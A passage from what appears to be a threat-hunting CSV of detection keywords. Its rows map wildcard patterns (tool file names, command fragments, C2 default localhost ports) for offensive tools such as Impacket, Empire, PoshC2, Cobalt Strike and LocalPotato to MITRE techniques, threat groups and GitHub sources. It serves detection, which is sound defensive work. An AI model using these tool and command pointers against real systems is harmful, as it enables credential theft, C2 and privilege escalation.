mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*loadKirbiFile*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*loadliba_reverse_tcp.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadliba_shell.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadliba_single_shell_reverse_tcp.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadmodule *.ps1*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*loadmodume */modules/*.ps1**,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Local: crc32 compensation attack*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*Local:Get-DelegateType*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Local:Get-PEArchitecture*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Local:Get-ProcAddress*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-local=0.0.0.0:4001*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*localexploit_demo_template.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*localhost/pipe/pwned*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*localhost:1337*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*localhost:1337*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*localhost:3000*striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*localhost:31337*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*localhost:3333*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*localhost:4567*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*localhost:4782*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*localhost:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*localhost:8022*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*localhost:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*localpotato -i*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.exe*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.sln*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.vcxproj*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.zip*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato-master*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*localreconmodules*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*localrelay_linux_amd64*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*locate password | more*,greyware_tool_keyword,locate,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*LocateBrc4Config*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*lochiccbgeohimldjooaakjllnafhaid*,greyware_tool_keyword,IP Unblock,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lockless *.dat*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*LockLess.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Locksmith-main.zip*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -*log4_shell.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*log4shell*.nessus.org*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*log4shell.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*LoGiC.NET.exe*,offensive_tool_keyword,LoGiC.NET,A more advanced free and open .NET obfuscator using dnlib,T1001,TA0011,N/A,N/A,Defense Evasion,https://github.com/AnErrupTion/LoGiC.NET,1,1,N/A,N/A,5,483,75,2023-08-23T09:55:54Z,2019-12-27T09:48:50Z -*loginsight.thrift*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*LogonTracer*,offensive_tool_keyword,LogonTracer,LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.,T1057 - T1087 - T1208,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/JPCERTCC/LogonTracer,1,0,N/A,N/A,10,2468,445,2023-09-08T13:32:03Z,2017-11-24T06:07:49Z -*logs/Responder-Session.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/ridenum.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/shares-with-SCF.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/theHarvester.py.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logToBeaconLog*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*LOLBAS-Project*,offensive_tool_keyword,LOLBAS-Project,Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool,T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001,TA0002 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://lolbas-project.github.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LOLBins/NetLoader.xml*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*Londor.exe -t Coverage*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*Londor.exe -t Script*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*looCiprian/GC2-sheet*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*lookupsid.py -hashes :* *@* 0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lookupsid.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral 